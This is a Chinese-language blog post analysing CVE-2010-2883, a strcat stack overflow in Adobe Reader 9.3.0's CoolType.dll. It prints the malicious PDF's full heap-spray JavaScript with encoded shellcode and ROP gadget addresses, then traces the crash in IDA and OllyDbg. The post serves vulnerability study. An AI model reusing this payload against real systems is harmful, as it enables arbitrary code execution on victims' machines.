CVE-2010-2883调试分析

2020-08-21

字数统计: 1.6k字 | 阅读时长≈ 7分

CVE-2010-2883是一个典型的由 strncat使用不当，造成的栈溢出。通过在未开启ASLR的lib的 gadget来实现 ROP，达到最终的恶意代码执行。

样本分析

CVE-2010-2883 是 Adobe Reader 和 Acrobat 中的 CoolType.dll 库在解析字体文件 SING 表中的 uniqueName项时存在的栈溢出漏洞，用户受骗打开了特制的 PDF 文件就有可能导致执行任意代码。使用 PdfStreamDumper提取出 PDF 样本里的 TTF 文件。 TTF中关于 SING 表的 TableEntry 结构数据，如下如所示：

官方文档中对 TableEntry 结构的定义：

typedef struct_SING
{
	char tag[4]; //标记：“SING”
	ULONG checkSum; //校验和：“0xD9BCC8B5”
	ULONG offset; //相对文件的偏移：“0x0000011c”
	ULONG length; //数据长度：“0x00001DDF”
} TableEntry;

SING表的数据结构如下图：

从TableEntry结构入口偏移 0x11c (上方offset值)即是 SING表的真实地址，也就是从 “00 00 01 00”开始的部分，接着再偏移 0x10 即可找到 uniqueName域，如下图所示：

执行 strcat() 后，会将 “58 E0 8D AD” 起始的部分赋值到 ebp 的指定地址 (0x0012e4d8)，直至遇到 NULL字符串终止符。 PDF中所带的 JS 代码如下所示，该代码我们可以看到利用了堆喷射，申请了大量堆块空间将 shellcode 写到每个堆块上，以提高 shellcode的命中率。同时在 shellcode 中增加了大量 “0c0c0c0c” 滑板命令，以此实现能够跳转到 shellcode执行

var unescape = unescape;
var shellcode = unescape(
'%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%
u4a80%u1064%u4a80%u22c8%u4a85%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0
102%u0000%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u000
0%ua8a6%u4a80%u1f90%u4a80%u9038%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0000%
u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2
db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9030%u4a84%ub692%u4a8
0%u1064%u4a80%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u63a5%
u4a80%u0004%u4a8a%u2196%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0
030%u0000%ua8a6%u4a80%u1f90%u4a80%u0004%u4a8a%ua7d8%u4a80%u63a5%u4a80%u1064%u4a8
0%u2db2%u4a84%u2ab1%u4a80%u0020%u0000%ua8a6%u4a80%u63a5%u4a80%u1064%u4a80%uaedc%
u4a80%u1f90%u4a80%u0034%u0000%ud585%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2
ab1%u4a80%u000a%u0000%ua8a6%u4a80%u1f90%u4a80%u9170%u4a84%ub692%u4a80%uffff%ufff
f%uffff%uffff%uffff%uffff%u1000%u0000%u4db8%u7614%uda79%ud9dd%u2474%u5bf4%uc929%
u31b1%u4331%u8313%u04c3%u4303%uf642%u8583%u74b4%u766b%u1944%u93e5%u1975%ud091%ua
925%ub5d1%u42c9%u2db7%u265a%u4110%u8deb%u6c46%ubeec%uefbb%ubd6e%ucfef%u0e4f%u0ee
2%u7388%u420f%uff41%u73a2%ub5e6%uff7e%u58b4%u1c07%u5a0c%ub326%u0507%u35e8%u3dc4%
u2da1%u7b09%uc57b%uf7f9%u0f7a%uf730%u6ed1%u0afd%ub62b%uf539%uce5e%u883a%u1558%u5
641%u8eec%u1de1%u6b56%uf110%uf801%ube1e%ua646%u4102%udc8a%uca3e%u332d%u88b7%u970
9%u4b9c%u8e33%u3d78%ud04c%ue223%u9ae8%uf7c9%uc080%u0687%u7f16%u09e5%u8028%u6259%
u0b19%uf536%udea6%u0973%u43ed%u82d5%u11a8%ucf64%ucc4a%uf6aa%ue5c8%u0d52%u8fd0%u4
957%u6356%uc225%u8333%ue39a%ue011%u707d%uc9f9%uf018%u1598' );
var a = unescape( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" +
"c" );
while (a.length + 20 + 8 < 65536) a += a;
b = a.substring(0, (0x0c0c-0x24)/2);
b += shellcode;
b += a;
f = b.substring(0, 65536/2);
while(f.length < 0x80000) f += f;
k = f.substring(0, 0x80000 - (0x1020-0x08) / 2);
var NwBg = new Array();
for (i =0;i<0x1f0;i++) NwBg[i]=k+"s";

漏洞调试

调试环境

	环境	备注
操作系统	Windows 10
调试器	OllyDbg	1.10
反汇编	IDA Pro	7.2
漏洞版本	Adobe Reader	9.3.0

漏洞分析

用IDA反汇编 CoolType.dll 库，查看字符串可以发现 “SING” 字体，因为该字符串是漏洞解析出错的地方，直接定位进去即可查看该库对 sing 表格的解析方式，主要是 strcat 造成的溢出漏洞：

.text:0803DBF2 		push ebp
.text:0803DBF3 		sub esp, 104h ; 分配栈空间0x104
.text:0803DBF9 		lea ebp, [esp-4] ; strcat()结果由ebp偏移计算
.text:0803DBFD 		mov eax, ___security_cookie
.text:0803DC02 		xor eax, ebp
.text:0803DC04 		mov [ebp+108h+var_4], eax
.text:0803DC0A 		push 4Ch
.text:0803DC0C 		mov eax, offset sub_81847C4
.text:0803DC11 		call __EH_prolog3_catch
.text:0803DC16 		mov eax, [ebp+108h+arg_C]
.text:0803DC1C 		mov edi, [ebp+108h+arg_0]
.text:0803DC22 		mov ebx, [ebp+108h+arg_4]
.text:0803DC28 		mov [ebp+108h+var_130], edi
.text:0803DC2B 		mov [ebp+108h+var_138], eax
.text:0803DC2E 		call sub_8041626
.text:0803DC33 		xor esi, esi
.text:0803DC35 		cmp dword ptr [edi+8], 3
.text:0803DC39 		mov [ebp+108h+var_10C], esi
.text:0803DC3C 		jz loc_803DDF9
.text:0803DC42 		mov [ebp+108h+var_124], esi
.text:0803DC45 		mov [ebp+108h+var_120], esi
.text:0803DC48 		cmp dword ptr [edi+0Ch], 1
.text:0803DC4C 		mov byte ptr [ebp+108h+var_10C], 1
.text:0803DC50 		jnz loc_803DDA2
.text:0803DC56 		push offset aName ; "name"
.text:0803DC5B 		push edi ; int
.text:0803DC5C 		lea ecx, [ebp+108h+var_124]
.text:0803DC5F 		mov [ebp+108h+var_119], 0
.text:0803DC63 		call sub_802178F
.text:0803DC68 		cmp [ebp+108h+var_124], esi
.text:0803DC6B 		jnz short loc_803DCD6
.text:0803DC6D 		push offset aSing ; "SING"
.text:0803DC72 		push edi ; int
.text:0803DC73 		lea ecx, [ebp+108h+var_12C] ; 指向SING表入口
.text:0803DC76 		call sub_8021ABE ; 处理SING表
.text:0803DC7B 		mov eax, [ebp+108h+var_12C]
.text:0803DC7E 		cmp eax, esi ; 判断是否为空
.text:0803DC80 		mov byte ptr [ebp+108h+var_10C], 2
.text:0803DC84 		jz short loc_803DCBD ; 此处不跳转
.text:0803DC86 		mov ecx, [eax] ; 字体资源版本号，这里为1.0版本，即00 10 00 00
.text:0803DC88 		and ecx, 0FFFFh
.text:0803DC8E 		jz short loc_803DC98 ; 这里跳转
.text:0803DC90 		cmp ecx, 100h
.text:0803DC96 		jnz short loc_803DCB9

.text:0803DC98
.text:0803DC98 		loc_803DC98: ; CODE XREF:
sub_803DBF2+9C•j
.text:0803DC98 		add eax, 10h ; 相对SING表入口偏移0x10，找到uniqueName地址
.text:0803DC9B 		push eax ; uniqueName域
.text:0803DC9C 		lea eax, [ebp+108h+var_108]
.text:0803DC9F 		push eax ; char * 目的地址是一大段栈空间
.text:0803DCA0 		mov [ebp+108h+var_108], 0
.text:0803DCA4 		call strcat ; 此处造成溢出

CoolType.dll 本来只是想拷贝 uniqueName域的字符串，但是由于 strcat()是由 “/x00” 来控制拷贝结束，所以该函数会将 SING 表中从 uniqueName域开始直到遇到 “/x00” 结束的所有字符串拷贝进固定地址。造成栈溢出。我们对拷贝的数据设置内存访问断点，查看引用数据的函数。

接着将拷贝的数据依次移动到另一个缓冲区内。

随后跳转运行到 CoolType.7B6B6B96

再跳转到 CoolType.7B6BBAD9

再跳转到 CoolType.7B72AFCE

最后我们在该函数中，可以看到漏洞触发点，指令 Call dword ptr ds:[eax] ，其中 eax 为我们输入的数据 4A80CB38

我们跟进，发现 4A80CB38 处地址为程序中的 gadget指令，猜测此处开始执行 ROP步骤。随后该指令返回到 4A82A714

4A82A714 处也是 gadget 指令，此时 Call dword ptr[eax+0x5c] 处地址为 0c0c0c0c ，根据我们输入的PDF中的JS代码，发现该地址是我们进行堆喷射使用的地址 0c0c0c0c ，此处由于Windows10的栈环境不同，导致该处地址出错，该地址为无效地址。程序调用无效地址，崩溃退出。

漏洞触发过程

1. 0x7B6DDCA4 call <jmp.&MSVCR80.strcat>; CoolType.dll模块，拷贝SING表数据，
栈溢出
2. 0x7B685827 mov bl, ptr ds:[ecx]; 拷贝溢出数据
3. 0x7B6DDDA8 call CoolType.7B6BBAD9; CoolType.dll模块
4. 0x7B6B6C0E call CoolType.7B72AFCE; CoolType.dll模块
5. 0x7B6BBAF9 call dword ptr ds:[eax]; 调用虚函数指针，调用输入数据
0x4A80CB38
6. 0x4A80CB38 add ebp, 0x794; 抬高栈基址，随后返回地址 0x4A82A714
7. 0x4A82A714 Call dword ptr[eax+0x5c]; 调用虚函数指针，此时地址为
0x0c0c0c0c，该地址 Windows10下触
发崩溃

本文作者： A1ex
本文链接： http://yoursite.com/2020/08/21/CVE-2010-2883调试分析/
版权声明： 本博客所有文章除特别声明外，均采用 MIT 许可协议。转载请注明出处！